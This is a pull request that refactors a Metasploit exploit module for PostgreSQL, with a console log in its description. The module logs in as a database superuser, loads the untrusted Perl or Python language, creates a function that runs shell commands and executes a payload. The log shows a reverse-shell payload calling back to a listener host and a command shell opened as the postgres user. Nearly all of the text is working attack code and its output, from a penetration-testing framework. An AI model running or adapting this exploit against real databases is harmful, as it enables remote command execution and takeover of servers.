### PR TITLE
Make code readable / Syntax check

### DIFF
--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -13,225 +13,196 @@ class Metasploit4 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Report
 
-  # Creates an instance of this module.
   def initialize(info = {})
     super(update_info(info,
-            'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
-            'Description' => %q(
-            Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
-            Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
-            To execute system commands, loading the "untrusted" version of the language is necessary.
-            This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
-            and has been tested on OS X, Windows, and Linux.
+      'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
+      'Description' => %q(
+        Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
+        Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
+        To execute system commands, loading the "untrusted" version of the language is necessary.
+        This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
+        and has been tested on OS X, Windows, and Linux.
 
-            This module attempts to load Perl or Python to execute system commands. As this dynamically loads
-            a scripting language to execute commands, it is not necessary to drop a file on the filesystem.
+        This module attempts to load Perl or Python to execute system commands. As this dynamically loads
+        a scripting language to execute commands, it is not necessary to drop a file on the filesystem.
 
-            Only Postgres 8 and up are supported.
-          ),
-          'Author' => [
-            'Micheal Cottingham', # author of this module
-            'midnitesnake', # the postgres_payload module that this is based on
-          ],
-          'License' => MSF_LICENSE,
-          'References' => [
-            ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
-            ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
-            ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
-          ],
-          'Platform' => %w(linux unix win osx),
-          'Payload' => {
-            'PayloadType' => %w(cmd)
-          },
-          'Arch' => [ARCH_CMD],
-          'Targets' => [
-            ['Automatic', {}]
-          ],
-          'DefaultTarget' => 0,
-          'DisclosureDate' => 'Jan 1 2016')
-    )
+        Only Postgres 8 and up are supported.
+      ),
+      'Author' => [
+        'Micheal Cottingham', # author of this module
+        'midnitesnake', # the postgres_payload module that this is based on,
+        'Nixawk' # Improves the module
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
+        ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
+        ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
+      ],
+      'Platform' => %w(linux unix win osx),
+      'Payload' => {
+        'PayloadType' => %w(cmd)
+      },
+      'Arch' => [ARCH_CMD],
+      'Targets' => [
+        ['Automatic', {}]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jan 1 2016'))
 
     deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
   end
 
+  def postgres_major_version(version)
+    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
+    version_match['major_version']
+  end
+
   def check
-    version = postgres_fingerprint
-
-    if version[:auth]
-      version_match = version[:auth].match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
-      major_version = version_match['major_version']
-
-      if major_version.to_i >= 8
-        return CheckCode::Appears
-
-      else
-        print_error "#{peer} - Unsupported version - #{version[:auth]}"
-        return CheckCode::Safe
-      end
-
+    if vuln_version?
+      Exploit::CheckCode::Appears
     else
-      print_error "#{peer} - Authentication failed"
-      return CheckCode::Unknown
+      Exploit::CheckCode::Safe
     end
   end
 
-  def exploit
-    version = do_login(username, password, database)
-
-    case version
-      when :noauth
-        print_error "#{peer} - Authentication failed"
-        return
-      when :noconn
-        print_error "#{peer} - Connection failed"
-        return
-      else
-        print_status "#{peer} - #{version}"
+  def vuln_version?
+    version = postgres_fingerprint
+    if version[:auth]
+      major_version = postgres_major_version(version[:auth])
+      return true if major_version.to_i >= 8
     end
+    false
+  end
 
-    version_match = version.match(/(?<software>\w{10})\s(?<major_version>\d{1,2})\.(?<minor_version>\d{1,2})\.(?<revision>\d{1,2})/)
-    major_version = version_match['major_version']
-    extension = 'LANGUAGE'
-
-    if major_version.to_i == 8
-      print_status "#{peer} - Selecting version 8 attack"
-      extension = 'LANGUAGE'
-    elsif major_version.to_i >= 9
-      print_status "#{peer} - Selecting version 9 attack"
-      extension = 'EXTENSION'
+  def login_success?
+    status = do_login(username, password, database)
+    case status
+    when :noauth
+      print_error "#{peer} - Authentication failed"
+      return false
+    when :noconn
+      print_error "#{peer} - Connection failed"
+      return false
     else
-      print_error "#{peer} - Unsupported version - #{version}"
+      print_status "#{peer} - #{status}"
+      return true
+    end
+  end
+
+  def load_extension?(language)
+    case load_procedural_language(language, 'LANGUAGE')
+    when :exists
+      print_good "#{peer} - #{language} is already loaded, continuing"
+      return true
+    when :loaded
+      print_good "#{peer} - #{language} was successfully loaded, continuing"
+      return true
+    when :not_exists
+      print_status "#{peer} - #{language} could not be loaded"
+      return false
+    else
+      print_error "#{peer} - error occurred loading #{language}"
       return false
     end
-
-    print_warning 'This exploit does not clean up after itself - you will need to do that manually'
-
-    # Attack!
-    begin
-      func_name = Rex::Text.rand_text_alpha(10)
-
-      languages = %w(perl python python2 python3)
-      loaded = false
-
-      languages.each do |language|
-        load_lang = create_language(language, extension)
-        human_language = language.capitalize
-
-        print_status "#{peer} - Attempting to load #{human_language}"
-
-        case load_lang
-          when :exists
-            print_good "#{peer} - #{human_language} is already loaded, continuing"
-            create_function(language, func_name)
-            loaded = true
-          when :loaded
-            print_good "#{peer} - #{human_language} was successfully loaded, continuing"
-            create_function(language, func_name)
-            loaded = true
-          when :not_exists
-            print_status "#{peer} - #{human_language} could not be loaded"
-          else
-            print_error "#{peer} - error occurred loading #{human_language}"
-        end
-
-        break if loaded
-      end
-
-      if loaded
-        # Known bug: When using the cmd/unix/python*, ruby*, or bash payloads, it'll say
-        # "NoMethodError undefined method `+' for nil:NilClass"
-        # But the exploit and payload work just fine. I'm open to suggestions on why and how to fix - @micheal
-        select_query = postgres_query("SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')")
-
-        case select_query.keys[0]
-          when :conn_error
-            print_error "#{peer} - Connection error"
-          when :sql_error
-            print_error "#{peer} - Exploit failed"
-            return false
-          when :complete
-            print_good "#{peer} - Exploit successful"
-        end
-
-      else
-        print_error "#{peer} - Exploit failed -- unable to load any languages"
-        return false
-      end
-    end
-
-    postgres_logout if @postgres_conn
   end
 
-  def create_function(language, func_name)
+  def exec_function?(func_name)
+    query = "SELECT exec_#{func_name}('#{payload.encoded.gsub("'", "''")}')"
+    select_query = postgres_query(query)
+
+    case select_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_error "#{peer} - Exploit failed"
+      return false
+    when :complete
+      print_good "#{peer} - Exploit successful"
+      return true
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+  end
+
+  def create_function?(language, func_name)
     load_func = ''
 
     case language
-      when 'perl'
-        load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$" \
-      "`$_[0]`;" \
-      "$$ LANGUAGE pl#{language}u")
-      when /^python(?:2|3)?/i
-        load_func = postgres_query("CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r" \
-      "import subprocess, shlex\r" \
-      "subprocess.check_output(shlex.split(c))\r" \
-      "$$ LANGUAGE pl#{language}u")
+    when 'perl'
+      query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(text) RETURNS void as $$"
+      query << "`$_[0]`;"
+      query << "$$ LANGUAGE pl#{language}u"
+      load_func = postgres_query(query)
+    when /^python(?:2|3)?/i
+      query = "CREATE OR REPLACE FUNCTION exec_#{func_name}(c text) RETURNS void as $$\r"
+      query << "import subprocess, shlex\rsubprocess.check_output(shlex.split(c))\r"
+      query << "$$ LANGUAGE pl#{language}u"
+      load_func = postgres_query(query)
     end
 
     case load_func.keys[0]
-      when :conn_error
-        print_error "#{peer} - Connection error"
-      when :sql_error
-        print_error "#{peer} Exploit failed"
-        return false
-      when :complete
-        print_good "#{peer} - Loaded UDF (exec_#{func_name})"
-    end
-  end
-
-  def create_language(language, extension)
-    load_language = postgres_query("CREATE #{extension} pl#{language}u")
-
-    if load_language.keys[0] == :sql_error
-
-      match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m)
-
-      if match_exists
-        return :exists
-      else
-        match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m)
-
-        if match_error
-          return :not_exists
-        end
-      end
-
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_error "#{peer} Exploit failed"
+      return false
+    when :complete
+      print_good "#{peer} - Loaded UDF (exec_#{func_name})"
+      return true
     else
-      return :loaded
+      print_error "#{peer} - Unknown"
+      return false
     end
   end
 
-  # Authenticate to the postgres server.
-  # Returns the version from #postgres_fingerprint
+  def load_procedural_language(language, extension)
+    query = "CREATE #{extension} pl#{language}u"
+    load_language = postgres_query(query)
+    return :loaded unless load_language.keys[0] == :sql_error
+
+    match_exists = load_language[:sql_error].match(/(?:(extension|language) "pl#{language}u" already exists)/m)
+    return :exists if match_exists
+
+    match_error = load_language[:sql_error].match(/(?:could not (?:open extension control|access) file|unsupported language)/m)
+    return :not_exists if match_error
+  end
+
   def do_login(user, pass, database)
     begin
       password = pass || postgres_password
-
       result = postgres_fingerprint(
         db: database,
         username: user,
         password: password
       )
 
-      if result[:auth]
-        return result[:auth]
-
-      else
-        print_status "#{peer} - Login failed"
-        return :noauth
-      end
+      return result[:auth] if result[:auth]
+      print_status "#{peer} - Login failed"
+      return :noauth
 
     rescue Rex::ConnectionError
       return :noconn
     end
+  end
+
+  def exploit
+    return unless vuln_version?
+    return unless login_success?
+
+    languages = %w(perl python python2 python3)
+    languages.each do |language|
+      next unless load_extension?(language)
+      func_name = Rex::Text.rand_text_alpha(10)
+      next unless create_function?(language, func_name)
+      if exec_function?(func_name)
+        print_warning "Please clear extension [#{language}]: function [#{func_name}] manually"
+        break
+      end
+    end
+    postgres_logout if @postgres_conn
   end
 end

--- a/modules/exploits/multi/postgres/postgres_createlang.rb
+++ b/modules/exploits/multi/postgres/postgres_createlang.rb
@@ -70,7 +70,7 @@ class Metasploit4 < Msf::Exploit::Remote
     version = postgres_fingerprint
     if version[:auth]
       major_version = postgres_major_version(version[:auth])
-      return true if major_version.to_i >= 8
+      return true if major_version && major_version.to_i >= 8
     end
     false
   end


### PR DESCRIPTION
#6417 - **Add Postgres createlang - Code execution with dynamic languages**

```
msf exploit(postgres_createlang) > show options

Module options (exploit/multi/postgres/postgres_createlang):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOST     192.168.1.103    yes       The target address
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.101    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(postgres_createlang) > check

[*] 192.168.1.103:5432 Postgres - querying with 'select version()'
[*] 192.168.1.103:5432 - The target appears to be vulnerable.
msf exploit(postgres_createlang) > run

[*] Started reverse TCP double handler on 192.168.1.101:4444 
[*] 192.168.1.103:5432 - PostgreSQL 9.4.5 on i686-pc-linux-gnu, compiled by gcc (Debian 5.3.1-3) 5.3.1 20151207, 32-bit
[+] 192.168.1.103:5432 - perl is already loaded, continuing
[+] 192.168.1.103:5432 - Loaded UDF (exec_ACdrqmRqfI)
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] 192.168.1.103:5432 - Exploit successful
[!] Please clear extension [perl]: function [ACdrqmRqfI] manually
[*] Command: echo EKFljKeDLU9cfPwg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "EKFljKeDLU9cfPwg\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 14 opened (192.168.1.101:4444 -> 192.168.1.103:37422) at 2016-02-22 00:42:11 +0800

id
uid=116(postgres) gid=123(postgres) groups=123(postgres),122(ssl-cert)
```